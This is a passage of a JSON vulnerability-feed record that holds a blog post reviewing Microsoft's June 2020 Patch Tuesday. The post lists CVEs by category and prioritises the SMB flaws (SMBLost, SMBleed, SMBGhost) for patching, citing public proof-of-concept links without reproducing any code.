"CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1242", "CVE-2020-1244", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1248", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1265", "CVE-2020-1266", "CVE-2020-1268", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1277", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1284", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1289", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1292", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1295", "CVE-2020-1296", "CVE-2020-1297", "CVE-2020-1298", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1306", "CVE-2020-1307", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1313", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1318", "CVE-2020-1320", "CVE-2020-1321", "CVE-2020-1322", "CVE-2020-1323", "CVE-2020-1324", "CVE-2020-1327", "CVE-2020-1328", "CVE-2020-1329", "CVE-2020-1331", "CVE-2020-1334", "CVE-2020-1340", "CVE-2020-1343", "CVE-2020-1348"], "description": "This time, Microsoft addressed 129 vulnerabilities: 11 critical and 118 important. In fact, in the file that I exported from the Microsoft website, I saw 2 more CVEs (CVE-2020-1221, CVE-2020-1328) related to Microsoft Dynamics 365 (on-premises). But there is no information on them on the Microsoft website, in the MITRE CVE database and NVD. Does this mean that these CVE ids were mentioned unintentionally and related to some critical issues? I don't think so, but this is strange.\n\n\n\nThis time there were no vulnerabilities with detected exploitation, so let's start with the group "Exploitation more likely" according to Microsoft.\n\n## Exploitation more likely (15)\n\n#### Remote Code Execution\n\n * Microsoft Browser ([CVE-2020-1219](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1219>))\n * VBScript ([CVE-2020-1214](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1214>), [CVE-2020-1215](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1215>), [CVE-2020-1230](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1230>), [CVE-2020-1213](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1213>), [CVE-2020-1216](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1216>), [CVE-2020-1260](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1260>))\n * Windows SMB ([CVE-2020-1301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301>))\n\n#### Denial of Service\n\n * Windows SMBv3 Client/Server ([CVE-2020-1284](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1284>))\n\n#### Elevation of Privilege\n\n * Windows Kernel ([CVE-2020-1207](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1207>), [CVE-2020-1247](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1247>), [CVE-2020-1251](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1251>), [CVE-2020-1253](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1253>))\n\n#### Security Feature Bypass\n\n * Windows Kernel ([CVE-2020-1241](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1241>))\n\n#### Information Disclosure\n\n * Windows SMBv3 Client/Server ([CVE-2020-1206](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1206>))\n\nI think the SMB vulnerabilities should be addressed first.\n\n 1. Remote Code Execution in SMBv1 (CVE-2020-1301) protocol is called "SMBLost". The attacker should send a specially crafted packet to the target SMBv1 server. But unlike the famous EternalBlue, the attacker have to be authenticated and there should be a shared partition on the server (e.g. \u201cc:\\\u201d or \u201cd:\\\u201d), so it should be much less harmful. Anyway, if SMBv1 is not a mission critical component of your infrastructure, disable it!\n 2. Denial of Service in SMBv3 Client or Server (CVE-2020-1284). An authenticated attacker have to send a specially crafted packet to a vulnerable SMB server or host a maliciously configured SMBv3 server and convince the client to connect to it. The vulnerability exists in Windows 10 Version 2004 and Windows Server, version 2004 (Server Core installation).\n 3. The most interesting SMB vulnerability is Information Disclosure in SMBv3 Client/Server (CVE-2020-1206). It is called "SMBleed". And what makes it interesting is that the company, that discovered this vulnerability, ZecOps, released a PoC that combines SMBleed exploitation with the exploitation of March SMBGhost (CVE-2020-0796) vulnerability to gain unauthenticated RCE! ([write up](<https://blog.zecops.com/vulnerabilities/smbleedingghost-writeup-chaining-smbleed-cve-2020-1206-with-smbghost/>) , [PoC](<https://github.com/ZecOps/CVE-2020-0796-RCE-POC>)) And it seems much more reliable than the code that was published earlier (for example, [PoC by chompie1337](<https://github.com/chompie1337/SMBGhost_RCE_PoC>)). This means that we are one step closer to real attacks that will exploit this vulnerability.\n\nOf course, you can say that SMBleed, SMBGhost and this new DoS vulnerability (CVE-2020-1284) affect only different versions of Windows 10 and Windows Server Core installations 1903, 1909, 2004. These Windows Server versions are pretty rare for a corporate environments and vulnerable desktops are not such a big problem. Well, yes, but can you guarantee that you do not have virtual machines with Windows 10 that are used as servers? You can only guarantee this with a good IT inventory process!\n\nWhat about other "Exploitation more likely" vulnerabilities? Well of course it's worth mentioning RCEs in Microsoft browsers (CVE-2020-1219): Internet Explorer 11 and Microsoft Edge. Also a lot of RCEs in VBScript (CVE-2020-1214, CVE-2020-1215, CVE-2020-1230, CVE-2020-1213, CVE-2020-1216, CVE-2020-1260). So, keep your web browser up-to-date and try not to click on suspicious links.\n\n## Other Product based (36)\n\n#### Microsoft SharePoint\n\n * Remote Code Execution ([CVE-2020-1181](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1181>))\n * Elevation of Privilege ([CVE-2020-1178](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1178>), [CVE-2020-1295](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1295>))\n * Cross Site Scripting ([CVE-2020-1177](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1177>), [CVE-2020-1183](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1183>), [CVE-2020-1297](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1297>), [CVE-2020-1298](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1298>), [CVE-2020-1318](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1318>), [CVE-2020-1320](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1320>))\n * Spoofing ([CVE-2020-1148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1148>), [CVE-2020-1289](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1289>))\n * Open Redirect ([CVE-2020-1323](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1323>))\n\n#### Windows Kernel\n\n * Elevation of Privilege ([CVE-2020-0986](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0986>), [CVE-2020-1237](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1237>), [CVE-2020-1246](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1246>), [CVE-2020-1262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1262>), [CVE-2020-1264](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1264>), [CVE-2020-1266](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1266>), [CVE-2020-1269](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1269>), [CVE-2020-1273](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1273>), [CVE-2020-1274](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1274>), [CVE-2020-1275](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1275>), [CVE-2020-1276](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1276>), [CVE-2020-1307](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1307>), [CVE-2020-1310](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1310>), [CVE-2020-1316](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1316>))\n * Information Disclosure ([CVE-2020-1290](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1290>))\n\n#### Windows Runtime\n\n * Elevation of Privilege ([CVE-2020-1231](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1231>), [CVE-2020-1233](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1233>), [CVE-2020-1235](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1235>), [CVE-2020-1265](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1265>), [CVE-2020-1282](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1282>), [CVE-2020-1304](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1304>), [CVE-2020-1306](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1306>), [CVE-2020-1334](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1334>))\n * Information Disclosure ([CVE-2020-1217](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1217>))\n\nAmong the products with the biggest number of vulnerabilities, we can once again highlight Microsoft SharePoint, and especially Remote Code Execution (CVE-2020-1181). "An authenticated attacker can execute code as the application\u2019s pool process". Other vulnerabilities are the Elevation of Privilege and Information Disclosure in Windows Kernel and Windows Runtime.\n\n## Other Vulnerability Type based (78)\n\n#### Remote Code Execution\n\n * Chakra Scripting Engine ([CVE-2020-1073](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1073>))\n * GDI+ ([CVE-2020-1248](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1248>))\n * Jet Database Engine ([CVE-2020-1208](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1208>), [CVE-2020-1236](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1236>))\n * LNK ([CVE-2020-1299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1299>))\n * Microsoft Excel ([CVE-2020-1225](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1225>), [CVE-2020-1226](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1226>))\n * Microsoft Office ([CVE-2020-1321](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1321>))\n * Windows ([CVE-2020-1300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1300>))\n * Windows OLE ([CVE-2020-1281](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1281>))\n * Windows Shell ([CVE-2020-1286](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1286>))\n * Word for Android ([CVE-2020-1223](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1223>))\n\n#### Denial of Service\n\n * Connected User Experiences and Telemetry Service ([CVE-2020-1120](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1120>), [CVE-2020-1244](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1244>))\n * Windows ([CVE-2020-1283](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1283>))\n * Windows Registry ([CVE-2020-1194](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1194>))\n\n#### Memory Corruption\n\n * Media Foundation ([CVE-2020-1238](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1238>), [CVE-2020-1239](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1239>))\n\n#### Elevation of Privilege\n\n * Component Object Model ([CVE-2020-1311](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1311>))\n * Connected Devices Platform Service ([CVE-2020-1211](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1211>))\n * Diagnostic Hub Standard Collector ([CVE-2020-1202](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1202>), [CVE-2020-1203](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1203>))\n * Diagnostics Hub Standard Collector ([CVE-2020-1257](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1257>), [CVE-2020-1278](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1278>), [CVE-2020-1293](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1293>))\n * DirectX ([CVE-2020-1258](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1258>))\n * Group Policy ([CVE-2020-1317](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1317>))\n * Microsoft Store Runtime ([CVE-2020-1222](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1222>), [CVE-2020-1309](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1309>))\n * Microsoft Windows Defender ([CVE-2020-1163](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1163>), [CVE-2020-1170](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1170>))\n * OLE Automation ([CVE-2020-1212](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1212>))\n * OpenSSH for Windows ([CVE-2020-1292](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1292>))\n * Windows ([CVE-2020-1162](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1162>), [CVE-2020-1324](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1324>))\n * Windows Background Intelligent Transfer Service ([CVE-2020-1255](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1255>))\n * Windows Backup Service ([CVE-2020-1271](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1271>))\n * Windows Bluetooth Service ([CVE-2020-1280](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1280>))\n * Windows Error Reporting ([CVE-2020-1234](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1234>))\n * Windows Error Reporting Manager ([CVE-2020-1197](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1197>))\n * Windows Feedback Hub ([CVE-2020-1199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1199>))\n * Windows GDI ([CVE-2020-0915](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0915>), [CVE-2020-0916](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0916>))\n * Windows Installer ([CVE-2020-1272](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1272>), [CVE-2020-1277](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1277>), [CVE-2020-1302](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1302>), [CVE-2020-1312](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1312>))\n * Windows Lockscreen ([CVE-2020-1279](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1279>))\n * Windows Mobile Device Management Diagnostics ([CVE-2020-1204](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1204>))\n * Windows Modules Installer Service ([CVE-2020-1254](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1254>))\n * Windows Network Connections Service ([CVE-2020-1291](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1291>))\n * Windows Network List Service ([CVE-2020-1209](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1209>))\n * Windows Now Playing Session Manager ([CVE-2020-1201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1201>))\n * Windows Print Configuration ([CVE-2020-1196](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1196>))\n * Windows State Repository Service ([CVE-2020-1305](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1305>))\n * Windows Text Service Framework ([CVE-2020-1314](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1314>))\n * Windows Update Orchestrator Service ([CVE-2020-1313](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1313>))\n * Windows WLAN Service ([CVE-2020-1270](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1270>))\n * Windows WalletService ([CVE-2020-1287](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1287>), [CVE-2020-1294](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1294>))\n\n#### Security Feature Bypass\n\n * Microsoft Outlook ([CVE-2020-1229](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1229>))\n * Windows Host Guardian Service ([CVE-2020-1259](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1259>))\n\n#### Information Disclosure\n\n * Internet Explorer ([CVE-2020-1315](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1315>))\n * Media Foundation ([CVE-2020-1232](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1232>))\n * Microsoft Edge ([CVE-2020-1242](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1242>))\n * Microsoft Graphics Component ([CVE-2020-1160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1160>))\n * Microsoft Project ([CVE-2020-1322](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1322>))\n * Visual Studio Code Live Share ([CVE-2020-1343](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1343>))\n * Windows Diagnostics & feedback ([CVE-2020-1296](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1296>))\n * Windows Error Reporting ([CVE-2020-1261](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1261>), [CVE-2020-1263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1263>))\n * Windows GDI ([CVE-2020-1348](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1348>))\n * Windows Service ([CVE-2020-1268](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1268>))\n\n#### Spoofing\n\n * Microsoft Bing Search ([CVE-2020-1329](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1329>))\n * Microsoft Edge (Chromium-based) in IE Mode ([CVE-2020-1220](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1220>))\n * NuGetGallery ([CVE-2020-1340](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1340>))\n * System Center Operations Manager ([CVE-2020-1331](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1331>))\n\n#### Code Injection\n\n * Azure DevOps Server ([CVE-2020-1327](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1327>))\n\nAmong other vulnerabilities, the most important are the various RCEs. \n\n * 2 RCE in Microsoft Excel (CVE-2020-1225, CVE-2020-1226). This might be interesting for phishing.\n * Yet another RCE in LNK file processing (CVE-2020-1299). This is the third this year.\n * RCE in Windows CAB files processing (CVE-2020-1300). Quote from zdi: the attackers "could also spoof a network printer and dupe a user into installing the specially crafted CAB file disguised as a printer driver. Users are often conditioned into trusting printer drivers when offered one, so it would not be surprising to see this get exploited".\n * VM vendors also pay attention to RCE in Chakra Scripting Engine (CVE-2020-1073), GDI+ (CVE-2020-1248), Jet Database Engine (CVE-2020-1208, CVE-2020-1236), Windows OLE (CVE-2020-1281) and Windows Shell (CVE-2020-1286).\n\nWhat else besides RCEs?\n\n * Nice Denial of Service in Windows Registry, but "an attacker would need access to the system in order to launch a crafted application to exploit this flaw."\n * A lot of Elevation of Privilege, but VM vendors highlight only vulnerabilities in OpenSSH for Windows (CVE-2020-1292) and Windows GDI (CVE-2020-0915, CVE-2020-0916).\n * Security Feature Bypass in Microsoft Outlook (CVE-2020-1229). It may "allow attackers to automatically load remote images \u2013 even from within the Preview Pane" and may be used with GDI+ RCE.\n * Among Information Disclosure vulnerabilities, ZDI highlights vulnerabilities in Microsoft Edge (CVE-2020-1242) and in Windows Diagnostics & feedback (CVE-2020-1296).\n\n## In conclusion\n\nIt's rather interesting month, but the focus is still mainly on SMB RCE vulnerabilities and the possible use of these vulnerabilities in malware attacks.\n\n", "modified": "2020-06-23T01:31:46", "published": "2020-06-23T01:31:46", "id": "AVLEONOV:24538B1ED96269982136AA43998E5780", "href": "http://feedproxy.google.com/~r/avleonov/~3/wWMcz38Q7hQ/", "type": "avleonov", "title": "Microsoft Patch Tuesday June 2020: The Bleeding Ghost of SMB", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}